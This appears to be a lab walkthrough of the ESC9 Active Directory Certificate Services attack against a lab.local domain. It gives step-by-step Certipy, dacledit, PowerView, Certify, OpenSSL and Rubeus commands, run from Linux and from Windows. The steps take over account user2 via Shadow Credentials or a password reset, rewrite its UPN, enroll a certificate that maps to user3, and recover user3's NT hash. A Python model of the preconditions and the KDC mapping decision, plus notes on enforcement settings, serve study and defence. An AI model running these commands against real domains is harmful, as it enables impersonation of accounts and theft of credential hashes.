ESC9
If the msPKI-Enrollment-Flag attribute of a certificate template includes the CT_FLAG_NO_SECURITY_EXTENSION flag (0x80000), certificates issued from that template do not carry the szOID_NTDS_CA_SECURITY_EXT extension (OID 1.3.6.1.4.1.311.25.2), which would otherwise embed the requester's SID. Without that extension the domain controller cannot map the certificate to an account by SID; as long as it is not in full enforcement mode it falls back to a weak mapping on the subject alternative name (the UPN for users, the DNS name for machines). ESC9 therefore also needs that fallback to be available: StrongCertificateBindingEnforcement on the DC set to 0 or 1 (compatibility mode) for Kerberos (PKINIT) authentication, or CertificateMappingMethods including UPN mapping (0x4) for Schannel.
An attacker who can write the userPrincipalName of another account can abuse this weak mapping:
- UPN manipulation: change the UPN of an account they control (or hold rights over) to the UPN of the target account.
- Certificate request: authenticate as that account and enroll in the vulnerable template; the CA writes the account's current UPN (now the target's) into the SAN and, because of the template flag, omits the SID extension.
- Certificate mapping: when the certificate is presented, the DC looks the account up by the UPN in the SAN and lands on the target.
- Result: the attacker holds a valid certificate that authenticates as the target account. The mapping is evaluated at authentication time, not at issuance, so the UPN can be reverted once the certificate is in hand.
```bash
# Find vulnerable templates (certipy-ad and certipy are the same tool under two binary names)
certipy-ad find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.228.236 -vulnerable -stdout
# Relevant part of the output
[!] Vulnerabilities
ESC9 : 'LAB.LOCAL\\Domain Users' can enroll and template has no security extension
```
To compromise user3 we need a right over some other account that can enroll in the template: in this walkthrough that is GenericAll (reported as FullControl by dacledit) over user2. That lets us both obtain credentials for user2 and rewrite user2's userPrincipalName to user3's UPN. We then enroll as user2 and the CA issues a certificate whose SAN is user3's UPN and which carries no SID extension, so it maps to user3 at authentication time.
Find the account we hold FullControl over
```bash
dacledit.py -action read -dc-ip 10.129.205.199 lab.local/blwasp:Password123! -principal blwasp -target user2
```
Get user2's NT hash through Shadow Credentials (certipy shadow auto adds a key credential to user2, authenticates with it and dumps the hash; the request step below uses that hash)
```bash
certipy shadow auto -u 'blwasp@lab.local' -p 'Password123!' -account user2
```
Change user2's UPN to user3's UPN. Domain controllers since Windows Server 2012 R2 reject a duplicate userPrincipalName, so if user3 already holds user3@lab.local explicitly, set the bare name user3 instead; the KDC also resolves a suffix-less UPN against the sAMAccountName.
```bash
certipy account update -u 'blwasp@lab.local' -p 'Password123!' -user user2 -upn user3@lab.local
```
Request a certificate as user2 with the hash from the Shadow Credentials step. Certipy names the output file after the identity in the certificate, so it is saved as user3.pfx.
```bash
certipy req -u 'user2@lab.local' -hashes 2b576acbe6bcfda7294d6bd18041b8fe -ca lab-LAB-DC-CA -template ESC9
```
Revert user2's UPN
```bash
certipy account update -u 'blwasp@lab.local' -p 'Password123!' -user user2 -upn user2@lab.local
```
Authenticate with the certificate: the KDC maps the UPN in the SAN to user3, returns a TGT and certipy recovers user3's NT hash. This only succeeds while the DC accepts certificates without the SID extension (StrongCertificateBindingEnforcement 0 or 1); in full enforcement mode the request is rejected and the DC logs KDC event 39.
```bash
certipy auth -pfx user3.pfx -domain lab.local
```
ESC9 Abuse from Windows
Enumeration with Certify.exe
```powershell
# Certify: list templates and check each one's msPKI-Enrollment-Flag for NO_SECURITY_EXTENSION (0x80000)
.\Certify.exe find /vulnerable
# On the DC: StrongCertificateBindingEnforcement must be 0 or 1 (compatibility) for the PKINIT path;
# 2 (full enforcement) rejects certificates without the SID extension. If the value is absent the
# default applies: compatibility mode until the February 2025 updates, full enforcement afterwards
reg query HKLM\SYSTEM\CurrentControlSet\Services\Kdc /v StrongCertificateBindingEnforcement
# Or, for the Schannel path, CertificateMappingMethods must include UPN mapping (0x4);
# the post-KB5014754 default is 0x18 (S4U2Self-based mapping only)
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Schannel /v CertificateMappingMethods
# With PowerView, find user objects over which our account holds GenericAll or GenericWrite
$blwasp = Get-DomainUser -Identity blwasp
Get-DomainObjectAcl -LDAPFilter "(&(objectClass=user)(objectCategory=person))" -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "GenericAll|GenericWrite" -and $_.SecurityIdentifier -eq $blwasp.objectsid }
```
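The checks above combine three facts: the template's enrollment flag, the KDC's enforcement level and Schannel's mapping methods. The following Python is an added example, not code from this page, Certipy or Certify: it parses `reg query` output of the form produced by the commands above, decides which authentication paths still accept a certificate that has no SID extension, and models the KDC's fallback from SID to UPN mapping that the UPN trick described at the top of the page relies on. The registry output, the directory contents and the SIDs are constructed for the example; the flag values and registry names are the real ones from MS-CRTD and KB5014754.

```python
"""ESC9 precondition check and certificate-mapping model (added example)."""
import re

# msPKI-Enrollment-Flag bits (MS-CRTD 2.26); ESC9 hinges on 0x80000.
ENROLLMENT_FLAGS = {
    0x2: "PEND_ALL_REQUESTS",
    0x8: "PUBLISH_TO_DS",
    0x20: "AUTO_ENROLLMENT",
    0x800: "ALLOW_ENROLL_ON_BEHALF_OF",
    0x80000: "NO_SECURITY_EXTENSION",
}
CT_FLAG_NO_SECURITY_EXTENSION = 0x80000
CT_FLAG_PUBLISH_TO_DS = 0x8

# HKLM\SYSTEM\CurrentControlSet\Services\Kdc\StrongCertificateBindingEnforcement (KB5014754)
KDC_DISABLED, KDC_COMPAT, KDC_FULL = 0, 1, 2

# HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Schannel\CertificateMappingMethods
SCHANNEL_UPN_MAPPING = 0x4               # weak: maps on the SAN UPN alone
SCHANNEL_DEFAULT_AFTER_KB5014754 = 0x18  # S4U2Self-based mapping only


def decode_enrollment_flags(value: int) -> list:
    """Names of the known bits set in an msPKI-Enrollment-Flag value."""
    return [name for bit, name in ENROLLMENT_FLAGS.items() if value & bit]


def parse_reg_query(output: str) -> dict:
    """Turn `reg query` REG_DWORD lines ("Name    REG_DWORD    0x1") into {name: int}."""
    values = {}
    for m in re.finditer(r"^\s*(\S+)\s+REG_DWORD\s+(0x[0-9a-fA-F]+|\d+)\s*$", output, re.M):
        values[m.group(1)] = int(m.group(2), 0)
    return values


def esc9_exposure(enrollment_flag: int, kdc_enforcement: int, mapping_methods: int) -> dict:
    """Which authentication paths accept a certificate from this template (no SID extension)."""
    no_ext = bool(enrollment_flag & CT_FLAG_NO_SECURITY_EXTENSION)
    return {
        "no_security_extension": no_ext,
        # Disabled (0) and compatibility (1) still accept certificates without the SID
        # extension and fall back to UPN/DNS mapping; full enforcement (2) rejects them.
        "kerberos_pkinit_abusable": no_ext and kdc_enforcement in (KDC_DISABLED, KDC_COMPAT),
        "schannel_abusable": no_ext and bool(mapping_methods & SCHANNEL_UPN_MAPPING),
    }


def map_certificate(cert_upn: str, cert_sid, directory: dict, kdc_enforcement: int):
    """Model of the KDC decision: SID extension first, UPN fallback only below full enforcement."""
    if cert_sid is not None:
        for sam, info in directory.items():
            if info["sid"] == cert_sid:
                return sam
        return None
    if kdc_enforcement == KDC_FULL:
        return None  # no strong mapping: rejected, KDC event 39 on the DC
    for sam, info in directory.items():
        if info["upn"].lower() == cert_upn.lower():
            return sam
    return None


# Constructed: what the two `reg query` commands might print on a DC that is still in
# compatibility mode and still allows UPN mapping for Schannel.
KDC_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc
    StrongCertificateBindingEnforcement    REG_DWORD    0x1
"""
SCHANNEL_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\Schannel
    CertificateMappingMethods    REG_DWORD    0x4
"""
# Constructed directory: user2 is the account we control, user3 is the target.
LAB = {
    "user2": {"sid": "S-1-5-21-1-2-3-1105", "upn": "user2@lab.local"},
    "user3": {"sid": "S-1-5-21-1-2-3-1106", "upn": "user3@lab.local"},
}
ESC9_TEMPLATE_FLAG = CT_FLAG_PUBLISH_TO_DS | CT_FLAG_NO_SECURITY_EXTENSION


def demo():
    kdc = parse_reg_query(KDC_REG_OUTPUT)["StrongCertificateBindingEnforcement"]
    schannel = parse_reg_query(SCHANNEL_REG_OUTPUT)["CertificateMappingMethods"]
    exposure = esc9_exposure(ESC9_TEMPLATE_FLAG, kdc, schannel)
    # user2's UPN was rewritten to user3@lab.local before enrollment, so the issued
    # certificate carries user3's UPN and, because of the template flag, no SID.
    mapped = map_certificate("user3@lab.local", None, LAB, kdc)
    hardened = map_certificate("user3@lab.local", None, LAB, KDC_FULL)
    return exposure, mapped, hardened


if __name__ == "__main__":
    print(decode_enrollment_flags(ESC9_TEMPLATE_FLAG))
    print(demo())
```

`demo()` reports the template as abusable over both PKINIT and Schannel, maps the forged certificate to user3 in compatibility mode, and returns no mapping once the KDC is in full enforcement, which is the remediation the registry checks are probing for.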
Attack from Windows
```powershell
# Reset user2's password (we hold GenericAll; noisy, but the simplest way to act as user2 from Windows)
Set-DomainUserPassword -Identity user2 -AccountPassword $(ConvertTo-SecureString 'Newpassword123!' -AsPlainText -Force) -Verbose
# Change user2's UPN to user3's (use the bare name user3 if the DC rejects the duplicate UPN)
Set-DomainObject user2 -Set @{'userPrincipalName'='user3@lab.local'} -Verbose
# Request a certificate from the ESC9 template as user2 (run Certify in a session authenticated as
# user2, e.g. runas /netonly with the new password). No /altname is needed or usable here: the
# template does not let the enrollee supply the SAN; the CA takes the UPN from the user2 object,
# which is now user3's
.\Certify.exe request /ca:LAB-DC.lab.local\lab-LAB-DC-CA /template:ESC9
# Revert user2's UPN afterwards, as in the Linux steps
Set-DomainObject user2 -Set @{'userPrincipalName'='user2@lab.local'} -Verbose
# Convert the returned PEM (certificate and key saved as user3.pem) to PFX
& "C:\Program Files\OpenSSL-Win64\bin\openssl.exe" pkcs12 -in .\user3.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out user3.pfx
# Get a TGT as user3 and recover user3's NT hash
.\Rubeus.exe asktgt /user:user3 /certificate:user3.pfx /getcredentials /nowrap
```